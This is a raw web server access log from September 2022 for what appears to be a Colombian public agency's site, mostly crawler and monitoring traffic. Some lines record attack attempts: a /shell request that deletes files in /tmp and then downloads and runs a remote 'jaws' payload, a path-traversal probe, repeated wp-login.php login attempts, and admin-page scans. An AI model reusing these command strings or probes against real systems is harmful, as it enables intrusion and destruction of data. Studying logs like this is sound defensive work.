179.125.50.50 - - [18/Sep/2022:01:24:15 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [18/Sep/2022:01:25:42 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.131 - - [18/Sep/2022:01:26:29 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [18/Sep/2022:01:28:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:01:27:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:27:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [18/Sep/2022:01:29:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41653
190.156.185.197 - - [18/Sep/2022:01:29:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/5766.pdf HTTP/1.1" 200 358420
201.245.192.253 - - [18/Sep/2022:01:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42604
157.55.39.200 - - [18/Sep/2022:01:29:59 -0500] "GET /bla/resoluciones/autos%202012/1471.pdf HTTP/1.1" 200 574655
66.249.73.127 - - [18/Sep/2022:01:30:33 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:01:30:42 -0500] "HEAD / HTTP/1.1" 200 -
94.102.61.10 - - [18/Sep/2022:01:31:46 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [18/Sep/2022:01:32:15 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 304 -
103.180.149.137 - - [18/Sep/2022:01:32:18 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
201.245.192.253 - - [18/Sep/2022:01:33:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.201 - - [18/Sep/2022:01:34:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/5766.pdf HTTP/1.1" 200 358420
95.108.213.56 - - [18/Sep/2022:01:34:30 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:01:32:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:33:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
216.245.221.92 - - [18/Sep/2022:01:35:42 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [18/Sep/2022:01:36:43 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Sep/2022:01:36:44 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [18/Sep/2022:01:38:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
201.245.192.253 - - [18/Sep/2022:01:39:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
201.245.192.253 - - [18/Sep/2022:01:39:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41653
201.245.192.253 - - [18/Sep/2022:01:39:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42604
172.22.2.4 - - [18/Sep/2022:01:38:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:01:40:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [18/Sep/2022:01:40:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:39:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [18/Sep/2022:01:41:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [18/Sep/2022:01:41:39 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:01:42:14 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2003%20del%2026%20de%20Julio%20de%202016.pdf HTTP/1.1" 304 -
185.119.81.104 - - [18/Sep/2022:01:43:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Sep/2022:01:43:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
95.108.213.59 - - [18/Sep/2022:01:45:35 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:01:45:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:44:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:01:46:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:01:45:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
66.249.73.127 - - [18/Sep/2022:01:48:48 -0500] "-" 408 -
207.46.13.86 - - [18/Sep/2022:01:48:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4500.pdf HTTP/1.1" 200 2845680
51.141.123.169 - - [18/Sep/2022:01:49:22 -0500] "\x16\x03\x03" 400 226
51.141.123.169 - - [18/Sep/2022:01:49:22 -0500] "\x16\x03\x03" 400 226
157.55.39.188 - - [18/Sep/2022:01:49:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2295.pdf HTTP/1.1" 200 403527
216.245.221.92 - - [18/Sep/2022:01:50:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:01:51:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
47.93.24.67 - - [18/Sep/2022:01:51:41 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+v1.kannimanelaji.com/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [18/Sep/2022:01:50:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:51:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
185.119.81.102 - - [18/Sep/2022:01:53:30 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:01:53:31 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
5.45.207.137 - - [18/Sep/2022:01:55:36 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:01:55:41 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [18/Sep/2022:01:55:57 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:01:56:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
185.119.81.102 - - [18/Sep/2022:01:56:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:01:56:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [18/Sep/2022:01:56:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:57:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
66.249.65.213 - - [18/Sep/2022:02:00:14 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:00:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:01:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:02:02:14 -0500] "GET /BLA/boletinlegal/actas/acta%20de%20acuerdo%2001%20adop%20regla%20inter%20CISPAER.pdf HTTP/1.1" 304 -
157.55.39.188 - - [18/Sep/2022:02:02:28 -0500] "GET /forest/ HTTP/1.1" 200 12041
192.241.219.123 - - [18/Sep/2022:02:03:15 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/Sep/2022:02:02:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:02:04:15 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:02:02:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
202.95.12.107 - - [18/Sep/2022:02:04:33 -0500] "\x16\x03\x01" 400 226
202.95.12.107 - - [18/Sep/2022:02:04:53 -0500] "GET / HTTP/1.1" 200 319
5.255.253.131 - - [18/Sep/2022:02:05:36 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:05:41 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [18/Sep/2022:02:05:53 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:02:05:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
202.95.12.107 - - [18/Sep/2022:02:06:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
202.95.12.107 - - [18/Sep/2022:02:06:29 -0500] "GET /sitemap.xml HTTP/1.1" 404 1018
201.245.192.253 - - [18/Sep/2022:02:06:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:02:06:44 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 304 -
66.249.73.127 - - [18/Sep/2022:02:06:57 -0500] "-" 408 -
20.191.45.212 - - [18/Sep/2022:02:08:56 -0500] "GET / HTTP/1.1" 200 319
20.191.45.212 - - [18/Sep/2022:02:08:56 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [18/Sep/2022:02:07:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:02:08:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [18/Sep/2022:02:10:41 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [18/Sep/2022:02:10:53 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:02:10:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [18/Sep/2022:02:11:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.188 - - [18/Sep/2022:02:12:30 -0500] "GET /galeria/galeria/fotos/Entrenube2G.jpg HTTP/1.1" 200 111422
157.55.39.188 - - [18/Sep/2022:02:12:31 -0500] "GET /galeria/galeria/fotos/mirador4G.jpg HTTP/1.1" 200 159827
157.55.39.188 - - [18/Sep/2022:02:12:31 -0500] "GET /galeria/mapa/humedal2017.jpg HTTP/1.1" 200 644667
157.55.39.202 - - [18/Sep/2022:02:12:35 -0500] "GET /galeria/galeria/fotos/Humedal-Santa-Mar%C3%ADa-del-Lago4G.jpg HTTP/1.1" 200 361652
157.55.39.202 - - [18/Sep/2022:02:12:37 -0500] "GET /galeria/galeria/fotos/Humedal-Vaca4G.jpg HTTP/1.1" 200 375197
207.46.13.131 - - [18/Sep/2022:02:12:37 -0500] "GET /galeria/galeria/fotos/Humedal-Santa-Mar%C3%ADa-del-Lago1G.jpg HTTP/1.1" 200 290867
207.46.13.86 - - [18/Sep/2022:02:12:40 -0500] "GET /galeria/galeria/fotos/1GuaymaralTorcaG1.jpg HTTP/1.1" 200 36592
207.46.13.86 - - [18/Sep/2022:02:12:41 -0500] "GET /galeria/galeria/fotos/Humedal-vaca6G.jpg HTTP/1.1" 200 176858
66.249.73.127 - - [18/Sep/2022:02:12:43 -0500] "-" 408 -
207.46.13.131 - - [18/Sep/2022:02:12:47 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica1G.jpg HTTP/1.1" 200 541579
207.46.13.131 - - [18/Sep/2022:02:12:49 -0500] "GET /galeria/galeria/fotos/Jaboque2G.jpg HTTP/1.1" 200 322400
172.22.2.4 - - [18/Sep/2022:02:13:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.253.174 - - [18/Sep/2022:02:15:36 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:15:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:02:14:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [18/Sep/2022:02:16:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [18/Sep/2022:02:18:43 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:02:19:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41654
201.245.192.253 - - [18/Sep/2022:02:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42301
216.245.221.92 - - [18/Sep/2022:02:20:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:02:19:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:21:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:02:20:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.73.127 - - [18/Sep/2022:02:24:21 -0500] "-" 408 -
207.46.13.131 - - [18/Sep/2022:02:24:34 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
5.45.207.91 - - [18/Sep/2022:02:25:36 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:25:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:26:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.200 - - [18/Sep/2022:02:26:45 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/Sep/2022:02:25:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.241.212.28 - - [18/Sep/2022:02:27:11 -0500] "MGLNDD_190.27.245.106_80" 501 953
172.22.2.4 - - [18/Sep/2022:02:26:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
201.245.192.253 - - [18/Sep/2022:02:29:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41654
201.245.192.253 - - [18/Sep/2022:02:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42301
66.249.73.127 - - [18/Sep/2022:02:30:01 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:30:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:31:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:02:31:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.86 - - [18/Sep/2022:02:33:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20701%20AL%20800/RESOLUCION%200705%20DE%202007.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Sep/2022:02:32:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
5.45.207.104 - - [18/Sep/2022:02:35:37 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:35:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:36:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [18/Sep/2022:02:36:49 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:02:37:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:02:37:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
201.245.192.253 - - [18/Sep/2022:02:39:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41654
201.245.192.253 - - [18/Sep/2022:02:39:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42301
216.245.221.92 - - [18/Sep/2022:02:40:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:41:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:02:42:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [18/Sep/2022:02:45:06 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:02:43:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
5.255.231.133 - - [18/Sep/2022:02:45:37 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:45:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:46:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
185.119.81.102 - - [18/Sep/2022:02:47:31 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:02:47:32 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
185.119.81.104 - - [18/Sep/2022:02:48:51 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Sep/2022:02:48:52 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [18/Sep/2022:02:48:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Sep/2022:02:50:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:02:49:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [18/Sep/2022:02:51:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [18/Sep/2022:02:52:09 -0500] "-" 408 -
87.250.224.169 - - [18/Sep/2022:02:52:15 -0500] "-" 408 -
95.108.213.20 - - [18/Sep/2022:02:52:20 -0500] "-" 408 -
87.250.224.187 - - [18/Sep/2022:02:52:26 -0500] "-" 408 -
87.250.224.90 - - [18/Sep/2022:02:52:32 -0500] "-" 408 -
66.249.65.213 - - [18/Sep/2022:02:52:41 -0500] "-" 408 -
5.45.207.141 - - [18/Sep/2022:02:52:47 -0500] "-" 408 -
87.250.224.6 - - [18/Sep/2022:02:53:02 -0500] "-" 408 -
87.250.224.3 - - [18/Sep/2022:02:53:32 -0500] "-" 408 -
95.108.213.24 - - [18/Sep/2022:02:54:33 -0500] "-" 408 -
213.180.203.67 - - [18/Sep/2022:02:55:33 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:02:55:41 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.84 - - [18/Sep/2022:02:55:45 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:02:54:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:02:56:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:02:55:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
66.249.73.127 - - [18/Sep/2022:02:58:38 -0500] "-" 408 -
5.255.231.118 - - [18/Sep/2022:02:58:41 -0500] "-" 408 -
5.62.57.73 - - [18/Sep/2022:02:58:47 -0500] "GET /administrator/index.php HTTP/1.1" 404 1035
5.62.57.73 - - [18/Sep/2022:02:58:48 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [18/Sep/2022:03:00:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:03:01:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.131 - - [18/Sep/2022:03:01:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0268.pdf HTTP/1.1" 200 455644
87.250.224.39 - - [18/Sep/2022:03:01:40 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:00:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:03:01:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
172.22.2.4 - - [18/Sep/2022:03:02:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
66.249.73.127 - - [18/Sep/2022:03:04:49 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:03:05:41 -0500] "HEAD / HTTP/1.1" 200 -
103.83.174.148 - - [18/Sep/2022:03:05:48 -0500] "GET /administrator/index.php HTTP/1.1" 404 1034
103.83.174.148 - - [18/Sep/2022:03:05:49 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Sep/2022:03:06:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
87.250.224.158 - - [18/Sep/2022:03:06:40 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:06:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:03:07:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [18/Sep/2022:03:10:41 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.188 - - [18/Sep/2022:03:10:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2206.pdf HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:03:11:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
103.83.174.148 - - [18/Sep/2022:03:11:24 -0500] "GET /administrator/index.php HTTP/1.1" 404 1038
103.83.174.148 - - [18/Sep/2022:03:11:24 -0500] "GET / HTTP/1.1" 200 319
207.46.13.181 - - [18/Sep/2022:03:12:06 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
66.249.73.127 - - [18/Sep/2022:03:12:10 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:13:23 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/Sep/2022:03:13:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [18/Sep/2022:03:12:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:03:12:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
87.250.224.107 - - [18/Sep/2022:03:14:40 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:03:15:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:03:16:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [18/Sep/2022:03:18:56 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:17:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:03:19:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41638
185.119.81.102 - - [18/Sep/2022:03:19:43 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:03:19:44 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [18/Sep/2022:03:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42444
185.119.81.104 - - [18/Sep/2022:03:20:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Sep/2022:03:20:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [18/Sep/2022:03:18:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [18/Sep/2022:03:20:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:03:21:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.86 - - [18/Sep/2022:03:21:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/5562.pdf HTTP/1.1" 304 -
156.146.36.209 - - [18/Sep/2022:03:24:22 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
87.250.224.27 - - [18/Sep/2022:03:24:41 -0500] "-" 408 -
185.119.81.102 - - [18/Sep/2022:03:25:19 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:03:25:20 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [18/Sep/2022:03:23:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Sep/2022:03:25:41 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [18/Sep/2022:03:26:10 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:24:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [18/Sep/2022:03:26:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
201.245.192.253 - - [18/Sep/2022:03:29:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41638
201.245.192.253 - - [18/Sep/2022:03:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42444
216.245.221.92 - - [18/Sep/2022:03:30:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:03:29:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:03:31:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:03:31:42 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 1018
66.249.73.127 - - [18/Sep/2022:03:31:48 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:30:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46728
5.255.253.137 - - [18/Sep/2022:03:34:42 -0500] "-" 408 -
157.55.39.153 - - [18/Sep/2022:03:35:07 -0500] "GET /portaldeninos/2021/05/30/agua-3/ HTTP/1.1" 200 92909
207.46.13.184 - - [18/Sep/2022:03:35:22 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
207.46.13.184 - - [18/Sep/2022:03:35:23 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
207.46.13.184 - - [18/Sep/2022:03:35:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
207.46.13.184 - - [18/Sep/2022:03:35:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
207.46.13.184 - - [18/Sep/2022:03:35:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
207.46.13.184 - - [18/Sep/2022:03:35:24 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
207.46.13.184 - - [18/Sep/2022:03:35:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
207.46.13.181 - - [18/Sep/2022:03:35:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
157.55.39.153 - - [18/Sep/2022:03:35:29 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
157.55.39.153 - - [18/Sep/2022:03:35:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
157.55.39.153 - - [18/Sep/2022:03:35:29 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
157.55.39.154 - - [18/Sep/2022:03:35:30 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
207.46.13.176 - - [18/Sep/2022:03:35:34 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
207.46.13.176 - - [18/Sep/2022:03:35:34 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
207.46.13.176 - - [18/Sep/2022:03:35:35 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
207.46.13.176 - - [18/Sep/2022:03:35:36 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
